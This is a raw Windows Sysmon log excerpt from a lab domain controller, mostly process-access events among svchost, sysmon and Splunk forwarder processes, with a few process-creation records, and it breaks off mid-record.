13:17:15.789{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004871Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:15.789{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004870Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:15.789{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004869Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:15.789{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004868Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:15.789{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004867Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:15.789{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004866Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:15.789{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-445B-6000-1301-000000009A01}4616C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004865Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:15.789{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-445B-6000-1301-000000009A01}4616C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004864Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:15.790{08A6967A-445B-6000-1301-000000009A01}4616C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004863Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:15.117{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-445B-6000-1201-000000009A01}816C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004862Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:15.117{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004861Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:15.117{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004860Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:15.117{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004859Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:15.117{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004858Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:15.117{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004857Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:15.117{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004856Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:15.117{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004855Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:15.117{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004854Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:15.117{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004853Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:15.117{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-445B-6000-1201-000000009A01}816C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004852Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:15.117{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-445B-6000-1201-000000009A01}816C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004851Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:15.118{08A6967A-445B-6000-1201-000000009A01}816C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004890Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:16.414{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-445C-6000-1401-000000009A01}4640C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004889Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:16.414{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004888Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:16.414{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004887Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:16.414{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004886Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:16.414{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C: